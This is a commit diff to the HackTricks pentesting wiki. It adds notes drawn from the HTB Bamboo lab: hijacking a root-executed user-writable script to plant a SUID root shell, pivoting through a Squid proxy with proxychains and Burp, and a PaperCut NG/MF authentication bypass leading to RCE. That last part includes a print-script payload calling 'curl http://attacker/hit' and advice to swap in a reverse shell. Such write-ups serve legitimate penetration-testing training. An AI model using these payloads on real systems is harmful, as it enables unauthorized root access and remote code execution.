Merge pull request #1852 from HackTricks-wiki/update_HTB__Bamboo_20260203_125756

carlospolop · web-flow · commit df746fe2d91e · 2026-02-12T23:38:52.000+01:00
HTB Bamboo
diff --git a/src/linux-hardening/privilege-escalation/write-to-root.md b/src/linux-hardening/privilege-escalation/write-to-root.md
@@ -60,6 +60,38 @@ Name=Evil Desktop Entry
 
 For more info check [**this post**](https://chatgpt.com/c/67fac01f-0214-8006-9db3-19c40e45ee49) where it was used to exploit a real vulnerability.
 
+### Root executing user-writable scripts/binaries
+
+If a privileged workflow runs something like `/bin/sh /home/username/.../script` (or any binary inside a directory owned by an unprivileged user), you can hijack it:
+
+- **Detect the execution:** monitor processes with [pspy](https://github.com/DominicBreuker/pspy) to catch root invoking user-controlled paths:
+
+```bash
+wget http://attacker/pspy64 -O /dev/shm/pspy64
+chmod +x /dev/shm/pspy64
+/dev/shm/pspy64   # wait for root commands pointing to your writable path
+```
+
+- **Confirm writeability:** ensure both the target file and its directory are owned/writable by your user.
+- **Hijack the target:** backup the original binary/script and drop a payload that creates a SUID shell (or any other root action), then restore permissions:
+
+```bash
+mv server-command server-command.bk
+cat > server-command <<'EOF'
+#!/bin/bash
+cp /bin/bash /tmp/rootshell
+chown root:root /tmp/rootshell
+chmod 6777 /tmp/rootshell
+EOF
+chmod +x server-command
+```
+
+- **Trigger the privileged action** (e.g., pressing a UI button that spawns the helper). When root re-executes the hijacked path, grab the escalated shell with `./rootshell -p`.
+
+## References
+
+- [HTB Bamboo – hijacking a root-executed script in a user-writable PaperCut directory](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
+
 {{#include ../../banners/hacktricks-training.md}}
 
 
diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md
@@ -42,7 +42,35 @@ Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.c
 python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131
 ```
 
-{{#include ../banners/hacktricks-training.md}}
+### Pivot & tooling configuration
+
+*Use Squid as a discovery pivot and a transparent upstream hop for CLI and browser tools.*
+
+- **Scan “from” the proxy:** run SPOSE through Squid to enumerate ports reachable from the proxy host/loopback. With [uv](https://github.com/astral-sh/uv) you can install deps and scan all TCP ports directly:
+
+```bash
+uv add --script spose.py -r requirements.txt
+uv run spose.py --proxy http://SQUID_IP:3128 --target localhost --allports
+```
 
+- **Proxychains for HTTP interaction:** append a strict HTTP entry at the bottom of `/etc/proxychains.conf`:
+
+```ini
+[ProxyList]
+http    SQUID_IP   3128
+```
 
+Then interact with internal listeners (e.g., a web UI bound to 127.0.0.1) transparently through Squid:
 
+```bash
+proxychains curl http://127.0.0.1:9191 -v
+```
+
+- **Chaining Burp/Browser → Squid:** configure Burp *Proxy → Settings → Network → Connections → Upstream proxy servers* to point to `http://SQUID_IP:3128`. Requests to internal hosts such as `http://127.0.0.1:9191` will traverse Browser → Burp → Squid → target, enabling full interception of services otherwise not reachable externally.
+
+## References
+
+- [SPOSE – Squid Pivoting Open Port Scanner](https://github.com/aancw/spose)
+- [HTB Bamboo walkthrough (Squid pivoting example)](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
+
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
@@ -206,6 +206,21 @@ Example payloads:
 
 Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see [Localhost WebSocket abuse](websocket-attacks.md#localhost-websocket-abuse--browser-port-discovery)) therefore translate directly into OS command execution.
 
+## PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE
+
+- Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose `/app?service=page/SetupCompleted`; browsing there and clicking **Login** returns a valid `JSESSIONID` without credentials (authentication bypass in the setup flow).
+- In **Options → Config Editor**, set `print-and-device.script.enabled=Y` and `print.script.sandboxed=N` to turn on printer scripting and disable the sandbox.
+- In the printer **Scripting** tab, enable the script and keep `printJobHook` defined to avoid validation errors, but place the payload **outside** the function so it executes immediately when you click **Apply** (no print job needed):
+
+```js
+function printJobHook(inputs, actions) {}
+cmd = ["bash","-c","curl http://attacker/hit"];
+java.lang.Runtime.getRuntime().exec(cmd);
+```
+
+- Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a payload with one command and exec it with a second request.
+- Horizon3's [CVE-2023-27350.py](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., `proxychains` → Squid) when the service is only reachable internally.
+
 ## Brute-Force Detection List
 
 
@@ -216,13 +231,14 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 
 ## References
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
 - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
+- [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
+- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
 
 {{#include ../banners/hacktricks-training.md}}
